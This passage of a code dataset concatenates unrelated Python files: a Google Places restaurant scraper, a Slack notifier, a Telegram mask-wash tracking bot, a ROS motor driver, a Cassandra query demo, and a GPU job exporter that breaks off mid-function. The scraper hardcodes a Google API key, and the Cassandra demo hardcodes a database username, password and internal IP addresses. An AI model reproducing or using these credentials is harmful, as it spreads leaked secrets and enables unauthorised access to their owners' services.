\"vicinity\",\r\n])\r\n\r\nPLACES_DETAIL_FIELDS_CONTACT = set([\r\n \"formatted_phone_number\", \"international_phone_number\", \"opening_hours\",\r\n \"website\",\r\n])\r\n\r\nPLACES_DETAIL_FIELDS_ATMOSPHERE = set([\"price_level\", \"rating\", \"review\",])\r\n\r\nPLACES_DETAIL_FIELDS = (PLACES_DETAIL_FIELDS_BASIC ^\r\n PLACES_DETAIL_FIELDS_CONTACT ^\r\n PLACES_DETAIL_FIELDS_ATMOSPHERE)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef geocode(client, address=None, components=None, bounds=None, region=None,\r\n language=None):\r\n \"\"\"\r\n Geocoding is the process of converting addresses\r\n (like ``\"1600 Amphitheatre Parkway, Mountain View, CA\"``) into geographic\r\n coordinates (like latitude 37.423021 and longitude -122.083739), which you\r\n can use to place markers or position the map.\r\n :param address: The address to geocode.\r\n :type address: string\r\n :param components: A component filter for which you wish to obtain a\r\n geocode, for example: ``{'administrative_area': 'TX','country': 'US'}``\r\n :type components: dict\r\n :param bounds: The bounding box of the viewport within which to bias geocode\r\n results more prominently.\r\n :type bounds: string or dict with northeast and southwest keys.\r\n :param 
region: The region code, specified as a ccTLD (\"top-level domain\")\r\n two-character value.\r\n :type region: string\r\n :param language: The language in which to return results.\r\n :type language: string\r\n :rtype: list of geocoding results.\r\n \"\"\"\r\n\r\n params = {}\r\n\r\n if address:\r\n params[\"address\"] = address\r\n\r\n if components:\r\n params[\"components\"] = convert.components(components)\r\n\r\n if bounds:\r\n params[\"bounds\"] = convert.bounds(bounds)\r\n\r\n if region:\r\n params[\"region\"] = region\r\n\r\n if language:\r\n params[\"language\"] = language\r\n\r\n return client._request(\"/maps/api/geocode/json\", params).get(\"results\", [])\r\n\r\n\r\ndef reverse_geocode(client, latlng, result_type=None, location_type=None,\r\n language=None):\r\n \"\"\"\r\n Reverse geocoding is the process of converting geographic coordinates into a\r\n human-readable address.\r\n :param latlng: The latitude/longitude value or place_id for which you wish\r\n to obtain the closest, human-readable address.\r\n :type latlng: string, dict, list, or tuple\r\n :param result_type: One or more address types to restrict results to.\r\n :type result_type: string or list of strings\r\n :param location_type: One or more location types to restrict results to.\r\n :type location_type: list of strings\r\n :param language: The language in which to return results.\r\n :type language: string\r\n :rtype: list of reverse geocoding results.\r\n \"\"\"\r\n\r\n # Check if latlng param is a place_id string.\r\n # place_id strings do not contain commas; latlng strings do.\r\n if convert.is_string(latlng) and ',' not in latlng:\r\n params = {\"place_id\": latlng}\r\n else:\r\n params = {\"latlng\": convert.latlng(latlng)}\r\n\r\n if result_type:\r\n params[\"result_type\"] = convert.join_list(\"|\", result_type)\r\n\r\n if location_type:\r\n params[\"location_type\"] = convert.join_list(\"|\", location_type)\r\n\r\n if language:\r\n params[\"language\"] = language\r\n\r\n return client._request(\"/maps/api/geocode/json\", params).get(\"results\", [])\r\n\r\n\r\n\r\ndef _places(client, url_part, query=None, location=None, radius=None,\r\n keyword=None, language=None, min_price=0, max_price=4, name=None,\r\n open_now=False, rank_by=None, type=None, region=None, page_token=None):\r\n \"\"\"\r\n Internal handler for ``places``, ``places_nearby``, and ``places_radar``.\r\n See each method's docs for arg details.\r\n \"\"\"\r\n\r\n params = {\"minprice\": min_price, \"maxprice\": max_price}\r\n\r\n if query:\r\n params[\"query\"] = query\r\n if location:\r\n params[\"location\"] = convert.latlng(location)\r\n if radius:\r\n params[\"radius\"] = radius\r\n if keyword:\r\n params[\"keyword\"] = keyword\r\n if language:\r\n params[\"language\"] = language\r\n if name:\r\n params[\"name\"] = convert.join_list(\" \", name)\r\n if open_now:\r\n params[\"opennow\"] = \"true\"\r\n if rank_by:\r\n params[\"rankby\"] = rank_by\r\n if type:\r\n params[\"type\"] = type\r\n if region:\r\n params[\"region\"] = region\r\n if page_token:\r\n params[\"pagetoken\"] = page_token\r\n\r\n url = \"/maps/api/place/%ssearch/json\" % url_part\r\n return client._request(url, params)\r\n\r\n\r\ndef places(client, query, location=None, radius=None, language=None,\r\n min_price=None, max_price=None, open_now=False, type=None, region=None,\r\n page_token=None):\r\n \"\"\"\r\n Places search.\r\n :param query: The text string on which to search, for example: \"restaurant\".\r\n :type query: string\r\n :param location: The 
latitude/longitude value for which you wish to obtain the\r\n closest, human-readable address.\r\n :type location: string, dict, list, or tuple\r\n :param radius: Distance in meters within which to bias results.\r\n :type radius: int\r\n :param language: The language in which to return results.\r\n :type language: string\r\n :param min_price: Restricts results to only those places with no less than\r\n this price level. Valid values are in the range from 0 (most affordable)\r\n to 4 (most expensive).\r\n :type min_price: int\r\n :param max_price: Restricts results to only those places with no greater\r\n than this price level. Valid values are in the range from 0 (most\r\n affordable) to 4 (most expensive).\r\n :type max_price: int\r\n :param open_now: Return only those places that are open for business at\r\n the time the query is sent.\r\n :type open_now: bool\r\n :param type: Restricts the results to places matching the specified type.\r\n The full list of supported types is available here:\r\n https://developers.google.com/places/supported_types\r\n :type type: string\r\n :param region: The region code, optional parameter.\r\n See more @ https://developers.google.com/places/web-service/search\r\n :type region: string\r\n :param page_token: Token from a previous search that when provided will\r\n returns the next page of results for the same search.\r\n :type page_token: string\r\n :rtype: result dict with the following keys:\r\n results: list of places\r\n html_attributions: set of attributions which must be displayed\r\n next_page_token: token for retrieving the next page of results\r\n \"\"\"\r\n return _places(client, \"text\", query=query, location=location,\r\n radius=radius, language=language, min_price=min_price,\r\n max_price=max_price, open_now=open_now, type=type, region=region,\r\n page_token=page_token)\r\n\r\n\r\ndef main():\r\n \r\n gmaps = googlemaps.Client(key='AIzaSyBWiZYIb2Jt715QJmla51ZKcx03OkSOmfg')\r\n\r\n g = geocoder.ip('me')\r\n\r\n latlng = g.latlng\r\n\r\n #latlng = [39.947141, -105.056640] #Broomfield, CO\r\n # latlng = [40.005657, -105.264368] #Boulder, CO\r\n\r\n american = places(gmaps, \"american food\", latlng)\r\n pizza = places(gmaps, \"pizza\", latlng)\r\n italian = places(gmaps, \"italian food\", latlng)\r\n chinese = places(gmaps, \"chinese food\", latlng)\r\n mexican = places(gmaps, \"mexican food\", latlng)\r\n indian = places(gmaps, \"indian food\", latlng)\r\n sandwiches = places(gmaps, \"sandwiches\", latlng)\r\n\r\n\r\n\t# print(latlng)\r\n\r\n with open('newRestaurants.csv', mode='w', newline='') as csv_file:\r\n fieldnames = ['name', 'category','rating', 'address', 'lat', 'long']\r\n writer = csv.writer(csv_file, delimiter='\"')\r\n\r\n for i in range(20):\r\n\t \t#distance = haversine(latlng[0], latlng[1], american['results'][i]['geometry']['location']['lat'], american['results'][i]['geometry']['location']['lng'])\r\n name = american['results'][i]['name']\r\n category = 'American'\r\n rating = american['results'][i]['rating']\r\n address = american['results'][i]['formatted_address']\r\n lat = american['results'][i]['geometry']['location']['lat']\r\n lng = american['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], chinese['results'][i]['geometry']['location']['lat'], chinese['results'][i]['geometry']['location']['lng'])\r\n name = chinese['results'][i]['name']\r\n category = 'Chinese'\r\n rating = 
chinese['results'][i]['rating']\r\n address = chinese['results'][i]['formatted_address']\r\n lat = chinese['results'][i]['geometry']['location']['lat']\r\n lng = chinese['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], indian['results'][i]['geometry']['location']['lat'], indian['results'][i]['geometry']['location']['lng'])\r\n name = indian['results'][i]['name']\r\n category = 'Indian'\r\n rating = indian['results'][i]['rating']\r\n address = indian['results'][i]['formatted_address']\r\n lat = indian['results'][i]['geometry']['location']['lat']\r\n lng = indian['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], italian['results'][i]['geometry']['location']['lat'], italian['results'][i]['geometry']['location']['lng'])\r\n name = italian['results'][i]['name']\r\n category = 'Italian'\r\n rating = italian['results'][i]['rating']\r\n address = italian['results'][i]['formatted_address']\r\n lat = italian['results'][i]['geometry']['location']['lat']\r\n lng = italian['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], mexican['results'][i]['geometry']['location']['lat'], mexican['results'][i]['geometry']['location']['lng'])\r\n name = mexican['results'][i]['name']\r\n category = 'Mexican'\r\n rating = mexican['results'][i]['rating']\r\n address = mexican['results'][i]['formatted_address']\r\n lat = mexican['results'][i]['geometry']['location']['lat']\r\n lng = mexican['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], pizza['results'][i]['geometry']['location']['lat'], pizza['results'][i]['geometry']['location']['lng'])\r\n name = pizza['results'][i]['name']\r\n category = 'Pizza'\r\n rating = pizza['results'][i]['rating']\r\n address = pizza['results'][i]['formatted_address']\r\n lat = pizza['results'][i]['geometry']['location']['lat']\r\n lng = pizza['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], sandwiches['results'][i]['geometry']['location']['lat'], sandwiches['results'][i]['geometry']['location']['lng'])\r\n name = sandwiches['results'][i]['name']\r\n category = 'Sandwiches'\r\n rating = sandwiches['results'][i]['rating']\r\n address = sandwiches['results'][i]['formatted_address']\r\n lat = sandwiches['results'][i]['geometry']['location']['lat']\r\n lng = sandwiches['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\t\t\r\n\r\n \r\n\r\n #done gathering data. 
Run C++ program\r\n\r\n\r\n # testRestaurant = \"River and Woods\"\r\n\r\n # os.system(\"a.exe \" + testRestaurant)\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","sub_path":"finalProject/structures/terminalUI/combinedPlacesAPI.py","file_name":"combinedPlacesAPI.py","file_ext":"py","file_size_in_byte":13724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"651296974","text":"# coding: utf-8\n# \nimport os\nimport requests\n\ndef post_to_slack(event, context):\n # This name has to match what we have in the serverless.yml\n slack_webhook_url = os.environ['SLACK_WEBHOOK_URL'] # The os module allows us to grab env vars\n \n # The \"event\" in the function definition above is a dictionary\n # so we can use the glob operation (**) to say send the entire dictionary to format()\n # then we can pick out whatever fields we want\n # Format looks inside the event dictionary for the fields\n slack_message = \"From {source} at {detail[StartTime]}: {detail[Description]}\".format(**event) \n data = { \"text\": slack_message }\n requests.post(slack_webhook_url, json=data)\n\n # No longer need to print out the event \n # print(slack_webhook_url)\n # print(event)\n \n return\n","sub_path":"02-notifon/notifier/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"436345970","text":"from defainHealth import *\n\nyear = inputNumber(\"Year => \", 1900, 9999)\nmonth = inputNumber(\"Month => \", 1, 12)\nday = inputNumber(\"Day => \", 1, LastDayOfTheMonth(year, month))\n\nf_month, f_day = calc(year, month-1, day + 25)\ne_month, e_day = calc(year, month-1, day + 38)\n\nprint(\"Normal >> \" + str(f_month) + \"/\" + str(f_day) + \" - \" + str(e_month) + \"/\" + str(e_day))\n\nif e_month == f_month:\n flag = 1\nelse:\n flag = 2\n\nfor i in range(0, flag):\n cnt = countLeapYear(year)\n days = countAllDays(year, f_month + i, cnt)\n blank = (days + 1) % 7\n printCalendar(year, f_month + i, blank)","sub_path":"Health/checkHealthCalendar.py","file_name":"checkHealthCalendar.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
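handler.py above relies on str.format's item-access syntax ({detail[StartTime]}) plus dict unpacking to pull fields out of a nested event. A standalone illustration - the field names mirror the record, the values are made up:

event = {"source": "aws.health",
         "detail": {"StartTime": "2020-01-01T00:00:00Z",
                    "Description": "Scheduled maintenance"}}
message = "From {source} at {detail[StartTime]}: {detail[Description]}".format(**event)
print(message)  # From aws.health at 2020-01-01T00:00:00Z: Scheduled maintenance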
+{"seq_id":"62895895","text":"#!/usr/bin/env python\n\nimport itertools\nfrom multiprocessing import Pool\nimport sys\nimport time\n\nfrom cassandra import ConsistencyLevel\nfrom cassandra.auth import PlainTextAuthProvider\nfrom cassandra.cluster import Cluster\nfrom cassandra.concurrent import execute_concurrent_with_args\nfrom cassandra.query import tuple_factory\n\n\ndef query_gen(n):\n # l = [('local') for x in range(n)]\n # print(l)\n for _ in range(n):\n yield ('local', )\n # return l\n\n\nclass QueryManager(object):\n\n concurrency = 100 # chosen to match the default in execute_concurrent_with_args\n\n def __init__(self, cluster, process_count=None):\n self.pool = Pool(processes=process_count, initializer=self._setup, initargs=(cluster,))\n print(\"Pool was built\")\n\n\n\n @classmethod\n def _setup(cls, cluster=None):\n auth_provider = PlainTextAuthProvider(username=\"statimreadwrite1\", password=\"st@tim123\")\n cluster = Cluster(\n contact_points=\"10.203.166.247,10.203.166.251,10.203.166.252,10.203.167.12,10.203.167.14,10.203.166.231\".split(\n \",\"),\n port=\"9042\",\n auth_provider=auth_provider,\n protocol_version=3\n )\n cls.session = cluster.connect()\n cls.session.default_timeout = 900\n cls.session.consistency_level = ConsistencyLevel.LOCAL_QUORUM\n # cls.session.set_keyspace(\"hl_supplemental_data\")\n cls.session.row_factory = tuple_factory\n cls.prepared = cls.session.prepare('SELECT * FROM system.local WHERE key=?')\n print(\"Cluster and session was built\")\n\n def close_pool(self):\n self.pool.close()\n self.pool.join()\n\n def get_results(self, params):\n # params = list(params)\n results = self.pool.map(_multiprocess_get, params)\n return list(itertools.chain(*results))\n\n @classmethod\n def _results_from_concurrent(cls, params):\n print(\"_results_from_concurrent was called with params\", params)\n # return [results[1] for results in execute_concurrent_with_args(cls.session, cls.prepared, params)]\n # pool.map delivers one parameter tuple per call; the driver expects a sequence of tuples\n return execute_concurrent_with_args(cls.session, cls.prepared, [params])\n\ndef _multiprocess_get(params):\n print(\"_multiprocess_get was called\",params)\n return QueryManager._results_from_concurrent(params)\n\n\nif __name__ == '__main__':\n iterations = 20\n processes = 4\n\n # cluster = Cluster()\n qm = QueryManager(None, processes) # second positional arg is the process count\n start = time.time()\n rows = qm.get_results(query_gen(iterations))\n delta = time.time() - start\n print (\"%d queries in %s seconds (%s/s)\" % (iterations, delta, iterations / delta))\n # print(query_gen(10))","sub_path":"CassandraDemo/syslocalmultiproc.py","file_name":"syslocalmultiproc.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"318905467","text":"import socket\nimport sys\nimport socket\nimport time\nimport random\nimport string\nimport errno\nfrom socket import error as socket_error\nfrom ClientBase import ClientBase\nfrom ClientBase import randomString\n\nclass tcpClient(ClientBase):\n def __init__(self, _ip, _port, _numPings = 4, _payloadSize = 64, _timeout = 1):\n super().__init__( _ip, _port, socket.SOCK_STREAM, _payloadSize, _numPings, _timeout)\n\n def ping(self): \n self.prePingOps()\n with socket.socket(socket.AF_INET, self.protocol) as sock:\n # send the data to the server\n try:\n sock.settimeout(self.timeout)\n self.pingPktsTx += 1\n sock.connect((self.serverIp, self.serverPort))\n msg = randomString(self.payloadSize)\n sock.sendall(bytes(msg + \"\\n\", \"utf-8\"))\n except socket.error as error:\n self.errorHandler(error)\n return\n # receive the data from the server\n try:\n received = str(sock.recv(self.rxBuffer), \"utf-8\")\n except socket.error as error:\n self.errorHandler(error)\n return\n self.postPingOps(received)\n\ndef main():\n c1 = tcpClient(\"127.0.0.1\", 9000)\n c1.routine()\n\nif __name__== \"__main__\":\n main()\n","sub_path":"TcpClient.py","file_name":"TcpClient.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
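TcpClient.py (via the ClientBase module, which is not part of this dump) sends one newline-terminated payload to 127.0.0.1:9000 and reads the reply. A minimal echo server to exercise it against, assuming the server is expected simply to mirror each line back:

import socketserver

class EchoHandler(socketserver.StreamRequestHandler):
    def handle(self):
        line = self.rfile.readline()   # client sends a single newline-terminated message
        self.wfile.write(line)         # echo it straight back

if __name__ == "__main__":
    with socketserver.TCPServer(("127.0.0.1", 9000), EchoHandler) as server:
        server.serve_forever()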
Use: \\n /add mask_name max_washes to start tracking a new mask \\n /remove to stop tracking a mask \\n /wash after you have washed the mask. \\n /help for information on additional commands.\",parse_mode ='HTML')\r\n\r\ndef help(update: Update, context:\r\n CallbackContext) -> None:\r\n update.message.reply_text(\"You can use: \\n /editname old_name new_name to change the name of your mask.\\n /editcurrent mask_name current_washes can be used to change the number of times the mask has been washed. \\n /editmax mask_name max_washes to change the max number of washes for the mask.\",parse_mode='HTML')\r\n\r\nd={}\r\ndef add(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n try:\r\n maskname = context.args[0]\r\n except IndexError:\r\n update.message.reply_text(\"Please enter a valid input, e.g. /add DET 50\", parse_mode=\"HTML\")\r\n return\r\n try:\r\n max_number = int(context.args[1])\r\n except IndexError:\r\n update.message.reply_text(\"Please enter a valid input, e.g. /add DET 50\", parse_mode=\"HTML\")\r\n except ValueError:\r\n update.message.reply_text(\"Please enter a valid input, e.g. /add DET 50\", parse_mode=\"HTML\")\r\n\r\n if user.username not in d:\r\n d[user.username] = {}\r\n if maskname not in d[user.username]:\r\n d[user.username][maskname]=[0,max_number]\r\n update.message.reply_text(f\"{maskname} successfully added!\")\r\n else:\r\n update.message.reply_text(f\"{maskname} is already added, please choose a different name.\")\r\n\r\n## Command for /wash\r\ndef wash(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n try:\r\n if not d[user.username].keys():\r\n update.message.reply_text(\"You have not added any masks, please use the /add command to do so.\")\r\n else:\r\n reply_keyboard=[d[user.username].keys()]\r\n update.message.reply_text(\"Please choose a mask.\",reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\r\n except KeyError:\r\n update.message.reply_text(\"You have not added any masks, please use the /add command to do so.\")\r\n\r\n## Message handler for wash\r\ndef chosen_wash(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n maskname = update.message.text\r\n\r\n try:\r\n d[user.username][maskname][0]+=1\r\n update.message.reply_text(f\"{maskname} has been washed {d[user.username][maskname][0]}/{d[user.username][maskname][1]} times.\")\r\n\r\n except KeyError:\r\n update.message.reply_text(\"You have not added this mask yet!\")\r\n else:\r\n if d[user.username][maskname][0] >= d[user.username][maskname][1]:\r\n update.message.reply_text(f\"{maskname} has been fully utilized, please dispose this mask and add another mask!\")\r\n\r\n## Command for /remove\r\ndef remove(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n reply_keyboard=[[\"remove \"+ i for i in d[user.username].keys()]]\r\n update.message.reply_text(\"Please choose a mask to remove.\",reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\r\n\r\n## Message handler for remove\r\ndef chosen_remove(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n maskname = update.message.text.replace(\"remove \",\"\")\r\n try:\r\n if maskname in d[user.username]:\r\n del d[user.username][maskname]\r\n update.message.reply_text(f\"{maskname} has been removed!\")\r\n else:\r\n update.message.reply_text(f\"{maskname} not found!\")\r\n except KeyError:\r\n update.message.reply_text(\"You have not added any masks, please use 
the /add command to do so.\")\r\n\r\n\r\n## Command for /view\r\ndef view(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n try:\r\n if not d[user.username]:\r\n update.message.reply_text(\"You have not added any masks, please use the /add command to do so.\")\r\n for i in d[user.username]:\r\n update.message.reply_text(f\"{i} has been washed {d[user.username][i][0]}/{d[user.username][i][1]} times.\")\r\n except KeyError:\r\n update.message.reply_text(\"You have not added any masks, please use the /add command.\")\r\n\r\n## Command for editname\r\ndef editname(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n old_name=context.args[0]\r\n new_name=context.args[1]\r\n try:\r\n d[user.username][new_name]=d[user.username][old_name]\r\n del d[user.username][old_name]\r\n update.message.reply_text(\"Mask name has been updated!\")\r\n except KeyError:\r\n update.message.reply_text(\"This mask does not exist!\")\r\n\r\n## Command for editcurrent\r\ndef editcurrent(update: Update, context: CallbackContext):\r\n user = update.message.from_user\r\n name = context.args[0]\r\n try:\r\n new_wash = int(context.args[1])\r\n d[user.username][name][0] = new_wash\r\n update.message.reply_text(\"Current mask wash has been updated!\")\r\n\r\n if new_wash>=d[user.username][name][1]:\r\n update.message.reply_text(f\"{name} has been fully utilized, please dispose this mask and add another mask!\")\r\n except KeyError:\r\n update.message.reply_text(\"This mask does not exist!\")\r\n except ValueError:\r\n update.message.reply_text(\"Please enter a valid input, eg. /editcurrent DET 33\",parse_mode = \"HTML\")\r\n\r\n\r\n## Command for editmax\r\ndef editmax(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n name = context.args[0]\r\n try:\r\n new_max = int(context.args[1])\r\n d[user.username][name][1]=new_max\r\n update.message.reply_text(\"Maximum number of washes has been updated!\")\r\n except KeyError:\r\n update.message.reply_text(\"Mask does not exist!\")\r\n except ValueError:\r\n update.message.reply_text(\"Please enter a valid input, eg. /editmax DET 50\",parse_mode = 'HTML')\r\n\r\n\r\ndef main():\r\n \"\"\"Run bot.\"\"\"\r\n # Updater with bot's token\r\n updater = Updater(TOKEN, use_context=True)\r\n\r\n # Dispatcher to register handlers\r\n dispatcher = updater.dispatcher\r\n\r\n # Command handlers and message handlers\r\n dispatcher.add_handler(CommandHandler(\"start\",start))\r\n dispatcher.add_handler(CommandHandler(\"help\",help))\r\n dispatcher.add_handler(CommandHandler(\"add\", add))\r\n\r\n dispatcher.add_handler(CommandHandler(\"wash\", wash))\r\n\r\n dispatcher.add_handler(CommandHandler(\"remove\", remove))\r\n dispatcher.add_handler(MessageHandler(Filters.regex(\"^remove\") & ~Filters.command, chosen_remove))\r\n\r\n #dispatcher.add_handler(CommandHandler(\"peep\", peep))\r\n dispatcher.add_handler(CommandHandler(\"view\",view))\r\n\r\n dispatcher.add_handler(CommandHandler(\"editname\",editname))\r\n dispatcher.add_handler(CommandHandler(\"editcurrent\",editcurrent))\r\n dispatcher.add_handler(CommandHandler(\"editmax\",editmax))\r\n\r\n dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, chosen_wash))\r\n\r\n # Start the Bot\r\n updater.start_polling()\r\n\r\n # Block until you press Ctrl-C or the process receives SIGINT, SIGTERM or\r\n # SIGABRT. 
This should be used most of the time, since start_polling() is\r\n # non-blocking and will stop the bot gracefully.\r\n updater.idle()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"bot_temp.py","file_name":"bot_temp.py","file_ext":"py","file_size_in_byte":8015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"154473399","text":"#!/usr/bin/env python\n\n## This program subscribes to /key_vel topic to read Twist messages\n# An if-else function sets the motor speeds based on these messages\n__author__ = \"Victor Freire, Rebecca Roembke, Wanyue Xu\"\n__email__ = \"freiremelgiz@wisc.edu\"\n\n# Dependencies\nimport rospy\nfrom pololu_drv8835_rpi import motors\nfrom geometry_msgs.msg import Twist\n\n## INIT Objects\n# Initialize node\nrospy.init_node('driver', anonymous=False)\n\n## Read the state of the keyboard and set motor speed\n# \"Arcade\" driving\ndef set_speed(msg):\n if(msg.linear.x == 5.0):\n motors.motor1.setSpeed(-200)\n motors.motor2.setSpeed(200)\n elif(msg.linear.x == -5.0):\n motors.motor1.setSpeed(200)\n motors.motor2.setSpeed(-200)\n elif(msg.angular.z == -1.0):\n motors.motor1.setSpeed(150)\n motors.motor2.setSpeed(150)\n elif(msg.angular.z == 1.0):\n motors.motor1.setSpeed(-150)\n motors.motor2.setSpeed(-150)\n else:\n motors.motor1.setSpeed(0)\n motors.motor2.setSpeed(0)\n\n\n# Listens Twist data continuously when called\ndef listener():\n # Create Subscriber for drive commands\n sub = rospy.Subscriber('/key_vel', Twist, set_speed)\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n listener()\n except rospy.ROSInterruptException:\n # Stop motors on error\n motors.motor1.setSpeed(0)\n motors.motor2.setSpeed(0)\n pass\n","sub_path":"src/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"357964220","text":"#!/usr/bin/env python3\n\nprint('Test9.2a')\n\ntrunk_dict={'FastEthernet0/1':[10,20],\n 'FastEthernet0/2':[11,30],\n 'FastEthernet0/4':[17]}\n\ntrunk_template = ['switchport trunk encapsulation dot1q',\n 'switchport mode trunk',\n 'switchport trunk native vlan 999',\n 'switchport trunk allowed vlan']\n\ndef generate_trunk_config(trunk):\n ''' \n trunk - a dict of trunk ports for which configuration should be generated.\n Returns a dict mapping each interface to the commands generated from the template\n '''\n \n tr_keys=[]\n for intr in trunk:\n tr_keys.append(intr)\n result=dict.fromkeys(tr_keys)\n\n for intr in trunk:\n output=[]\n for line in trunk_template:\n if line.endswith('allowed vlan'):\n addline=line + ' ' + str(trunk[intr]).strip('[]')\n output.append(addline)\n else:\n output.append(line)\n result[intr]=output\n return result\n\nprint(generate_trunk_config(trunk_dict))\n","sub_path":"Test09/test9.2a.py","file_name":"test9.2a.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
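generate_trunk_config above returns {interface: [commands]}; flattening that into CLI-style text is a short step. A hypothetical rendering helper (not part of the record), shown with an inline sample:

def render_config(cfg):
    """Flatten {interface: [commands]} into an IOS-style config snippet."""
    lines = []
    for intf, commands in sorted(cfg.items()):
        lines.append("interface " + intf)
        lines.extend(" " + cmd for cmd in commands)
    return "\n".join(lines)

print(render_config({"FastEthernet0/4": ["switchport mode trunk",
                                         "switchport trunk allowed vlan 17"]}))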
+{"seq_id":"75245081","text":"#!/usr/bin/python\n# Copyright (c) Microsoft Corporation\n# All rights reserved.\n#\n# MIT License\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated\n# documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and\n# to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING\n# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nimport copy\nimport sys\nimport time\nimport logging\n\nimport docker_stats\nimport docker_inspect\nimport gpu_exporter\nimport network\nimport utils\nfrom utils import Metric\n\nlogger = logging.getLogger(__name__)\n\n\n# k8s will prepend \"k8s_\" to pod name. There will also be a container name prepended with \"k8s_POD_\"\n# which is a docker container used to construct network & pid namespace for a specific container. These\n# containers prepended with \"k8s_POD\" consume nothing.\n# Materialized with list() so it can be scanned once per container; a bare map iterator\n# would be exhausted after the first pass under Python 3.\npai_services = list(map(lambda s: \"k8s_\" + s, [\n \"rest-server\",\n \"pylon\",\n \"webportal\",\n \"grafana\",\n \"prometheus\",\n \"alertmanager\",\n \"watchdog\",\n \"end-to-end-test\",\n \"yarn-frameworklauncher\",\n \"hadoop-jobhistory-service\",\n \"hadoop-name-node\",\n \"hadoop-node-manager\",\n \"hadoop-resource-manager\",\n \"hadoop-data-node\",\n \"zookeeper\",\n \"node-exporter\",\n \"job-exporter\",\n \"yarn-exporter\",\n \"nvidia-drivers\"\n]))\n\ndef parse_from_labels(labels):\n gpuIds = []\n otherLabels = {}\n\n for key, val in labels.items():\n if \"container_label_GPU_ID\" == key:\n s2 = val.replace(\"\\\"\", \"\").split(\",\")\n for id in s2:\n if id:\n gpuIds.append(id)\n else:\n otherLabels[key] = val\n\n return gpuIds, otherLabels\n\n\ndef collect_job_metrics(gpu_infos, all_conns):\n stats = docker_stats.stats()\n if stats is None:\n logger.warning(\"docker stats returns None\")\n return None\n\n result = []\n for container_id, stats in stats.items():\n pai_service_name = None\n\n # TODO speed this up, since this is O(n^2)\n for service_name in pai_services:\n if stats[\"name\"].startswith(service_name):\n pai_service_name = service_name[4:] # remove \"k8s_\" prefix\n break\n\n inspect_info = docker_inspect.inspect(container_id)\n pid = inspect_info[\"pid\"] if inspect_info is not None else None\n inspect_labels = utils.walk_json_field_safe(inspect_info, \"labels\")\n\n if not inspect_labels and pai_service_name is None:\n continue # other container, maybe kubelet or api-server\n\n # get network consumption, since all our services/jobs running in host network,\n # network statistic from docker is not specific to that container. 
